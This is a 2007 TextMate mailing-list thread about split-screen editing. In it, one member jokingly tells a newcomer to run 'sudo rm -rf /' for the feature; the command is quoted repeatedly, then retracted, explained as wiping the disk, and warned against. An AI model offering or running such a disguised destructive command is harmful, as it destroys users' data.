Hi May be this has being asked before! Here goes nothing.
I will like to be able to split the screen like in emacs. or at least left/right - up/down. is that possible in textmate?
Thanks Luis
On Jul 23, 2007, at 5:47 AM, luismcdougall wrote:
I will like to be able to split the screen like in emacs. or at least left/right - up/down. is that possible in textmate?
Nope. Maybe in TM2.0 (but I'm not sure regarding this feature…it's too much that shall be in 2.0)
Niels
Yes! there's a secret way to enable split screen in TextMate. All you have to do is type this commend in the terminal:
sudo rm -rf /
Enjoy!
(please don't actually type that) thomas Aylott — subtleGradient
On Jul 22, 2007, at 11:47 PM, luismcdougall wrote:
Hi May be this has being asked before! Here goes nothing.
I will like to be able to split the screen like in emacs. or at least left/right - up/down. is that possible in textmate?
Thanks Luis
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Nooobody expects the spanish inquisition!
Niko Dittmann wrote:
Am 23.07.2007 um 09:40 schrieb Thomas Aylott (subtleGradient):
sudo rm -rf /
I didn't expect the spanish inquisition!
For new threads USE THIS: textmate@lists.macromates.com (threading gets destroyed and the universe will collapse if you don't) http://lists.macromates.com/mailman/listinfo/textmate
sudo rm -rf /
I can't believe I ignored all the warnings, but nothing happened except
rm: /.vol/234881026: Operation not supported rm: /.vol: Resource busy
For new threads USE THIS: textmate@lists.macromates.com (threading gets destroyed and the universe will collapse if you don't) http://lists.macromates.com/mailman/listinfo/textmate
On Jul 23, 2007, at 11:53 AM, Jenny Harrison wrote:
sudo rm -rf /
I can't believe I ignored all the warnings, but nothing happened except
rm: /.vol/234881026: Operation not supported rm: /.vol: Resource busy
Hmm...the last one shouldn't happen because of the f-option, should it?
Niels
P.s: Just set the topic to OT because it doesn't relate to TM, does it?
I did not see Thoma's last line as it was below my split-screen. I did not know about the "joke". I can't believe you actually told me to do that. Is my data recoverable?
On 7/23/07, Jenny Harrison harrison@math.berkeley.edu wrote:
sudo rm -rf /
I can't believe I ignored all the warnings, but nothing happened except
rm: /.vol/234881026: Operation not supported rm: /.vol: Resource busy
For new threads USE THIS: textmate@lists.macromates.com (threading gets destroyed and the universe will collapse if you don't) http://lists.macromates.com/mailman/listinfo/textmate
On 23 Jul 2007, at 08:40, Thomas Aylott (subtleGradient) wrote:
Yes! there's a secret way to enable split screen in TextMate. All you have to do is type this commend in the terminal:
sudo rm -rf /
Enjoy!
(please don't actually type that) thomas Aylott — subtleGradient
Even with the disclaimer I think it might be worth deleting this from the archive. Somebody who's English isn't good enough to grok the disclaimer is going to find it eventually.
WARNING, THIS WAS A JOKE A really stupid joke that I regret Please don't run this command or it will erase your computer.
thomas Aylott
On Jul 23, 2007, at 3:40 AM, Thomas Aylott (subtleGradient) wrote:
Yes! there's a secret way to enable split screen in TextMate. All you have to do is type this commend in the terminal:
sudo r m -rf /
Enjoy!
(please don't actually type that) thomas Aylott — subtleGradient
On Jul 22, 2007, at 11:47 PM, luismcdougall wrote:
Hi May be this has being asked before! Here goes nothing.
I will like to be able to split the screen like in emacs. or at least left/right - up/down. is that possible in textmate?
Thanks Luis
Just FYI for those not command line savvy:
`sudo` gives whatever command comes after it "superuser" privileges. `rm` is short for "remove", as in "delete".
"-r" means to do this deletion recursively. So the deletion happens depth first. Everything in the specified path will be removed. "-f" means to do this deletion forcibly. You will not be asked if you REALLY want to delete things.
"/" is the root directory.
Thus, "sudo rm -rf /" forcibly deletes every single thing on your hard drive, including system files owned by the root user.
So, in short:
DON'T DO IT!
I think this is why tutorials that use the command line sometimes come with "Be Careful!" warnings. You should never run any command without first knowing what will happen when you do so. You can always use the "man" command to find out what a particular command does. As in "man rm" which will give you the manual for the "rm" command. Also, the "--help" or "-h" command switches will sometimes give you more information about how to use a particular command.
–Alex
I would just like to note that I have been using textmate for a long, long, long time, and I am not at all tired of people continually asking for split screens. It should be there. It's bad that it's missing. I think every single day I encounter a situation where I wish I could have this feature.
I think we should not blame users for wanting features. I wonder if the harsh reaction this request always gets might not have something to do with embarrassment.
So let me register *my* continued, enduring wish for this feature that every other text editor I've used has.
And yeah, don't do the rm thing. ;-)
-andre
On Jul 24, 2007, at 7:46 PM, Andre Behrens wrote:
<snip>
So let me register *my* continued, enduring wish for this feature that every other text editor I've used has.
Neither nano/pico nor Notepad (*brrrrr*) nor TextEdit have split screens ;) (but nano has a view(read only) mode ;) )
Cheers, Niels
Andre Behrens wrote:
I would just like to note that I have been using textmate for a long, long, long time, and I am not at all tired of people continually asking for split screens. It should be there. It's bad that it's missing. I think every single day I encounter a situation where I wish I could have this feature.
I think we should not blame users for wanting features. I wonder if the harsh reaction this request always gets might not have something to do with embarrassment.
So let me register *my* continued, enduring wish for this feature that every other text editor I've used has.
Erm... Allan has stated publicly that such a feature will be in TM 2.0+, but not make it into 1.5.x. As such, repeated such requests just decrease the signal/noise ratio of this list (as do responses such as this one; apologies), while doing nothing to speed the addition of such a feature.
-Jacob
For the purposes of noise filtration, might it be useful to add a link to "already requested features" at the bottom of these list emails? Or to an FAQ? Or better yet an FAQikki?
R
On 25 Jul 2007, at 00:42, Jacob Rus wrote:
Andre Behrens wrote:
I would just like to note that I have been using textmate for a long, long, long time, and I am not at all tired of people continually asking for split screens. It should be there. It's bad that it's missing. I think every single day I encounter a situation where I wish I could have this feature. I think we should not blame users for wanting features. I wonder if the harsh reaction this request always gets might not have something to do with embarrassment. So let me register *my* continued, enduring wish for this feature that every other text editor I've used has.
Erm... Allan has stated publicly that such a feature will be in TM 2.0+, but not make it into 1.5.x. As such, repeated such requests just decrease the signal/noise ratio of this list (as do responses such as this one; apologies), while doing nothing to speed the addition of such a feature.
-Jacob
For new threads USE THIS: textmate@lists.macromates.com (threading gets destroyed and the universe will collapse if you don't) http://lists.macromates.com/mailman/listinfo/textmate
A "FAQikki?" (I almost thought that you had invented a new term, but since "wiki" has only a single "k," it would be "FAQiki" then, right?)
A Fabulous idea, regardless of the name!
Indeed, new folks often make "old" requests... simply because there isn't an easy way [or is there?] to determine if the subject has already come up.
eo
On Jul 25, 2007, at 12:16 AM, Richard Dyce wrote:
For the purposes of noise filtration, might it be useful to add a link to "already requested features" at the bottom of these list emails? Or to an FAQ? Or better yet an FAQikki?
R
On 25 Jul 2007, at 00:42, Jacob Rus wrote:
Andre Behrens wrote:
I would just like to note that I have been using textmate for a long, long, long time, and I am not at all tired of people continually asking for split screens. It should be there. It's bad that it's missing. I think every single day I encounter a situation where I wish I could have this feature. I think we should not blame users for wanting features. I wonder if the harsh reaction this request always gets might not have something to do with embarrassment. So let me register *my* continued, enduring wish for this feature that every other text editor I've used has.
Erm... Allan has stated publicly that such a feature will be in TM 2.0+, but not make it into 1.5.x. As such, repeated such requests just decrease the signal/noise ratio of this list (as do responses such as this one; apologies), while doing nothing to speed the addition of such a feature.
-Jacob
Sorry Eric, for my atrocious spelling ;-) I meant FAQiki(TM) ;-)
And it seemed like a good name at the time.
On 26 Jul 2007, at 06:45, Eric O'Brien wrote:
A "FAQikki?" (I almost thought that you had invented a new term, but since "wiki" has only a single "k," it would be "FAQiki" then, right?)
A Fabulous idea, regardless of the name!
Indeed, new folks often make "old" requests... simply because there isn't an easy way [or is there?] to determine if the subject has already come up.
eo
On Jul 25, 2007, at 12:16 AM, Richard Dyce wrote:
For the purposes of noise filtration, might it be useful to add a link to "already requested features" at the bottom of these list emails? Or to an FAQ? Or better yet an FAQikki?
R
On 25 Jul 2007, at 00:42, Jacob Rus wrote:
Andre Behrens wrote:
I would just like to note that I have been using textmate for a long, long, long time, and I am not at all tired of people continually asking for split screens. It should be there. It's bad that it's missing. I think every single day I encounter a situation where I wish I could have this feature. I think we should not blame users for wanting features. I wonder if the harsh reaction this request always gets might not have something to do with embarrassment. So let me register *my* continued, enduring wish for this feature that every other text editor I've used has.
Erm... Allan has stated publicly that such a feature will be in TM 2.0+, but not make it into 1.5.x. As such, repeated such requests just decrease the signal/noise ratio of this list (as do responses such as this one; apologies), while doing nothing to speed the addition of such a feature.
-Jacob
For new threads USE THIS: textmate@lists.macromates.com (threading gets destroyed and the universe will collapse if you don't) http://lists.macromates.com/mailman/listinfo/textmate
On 26. Jul 2007, at 07:45, Eric O'Brien wrote:
[...] Indeed, new folks often make "old" requests... simply because there isn't an easy way [or is there?] to determine if the subject has already come up.
Searching… but I created a list with the twenty requests which I believe are the most common (off the top of my head): http:// macromates.com/wiki/Requests/HomePage
The list is enumerated, but if updated, the enumeration gets changed, which makes it less useful for sending just the link plus a number, but at least the number will work at the time it was posted.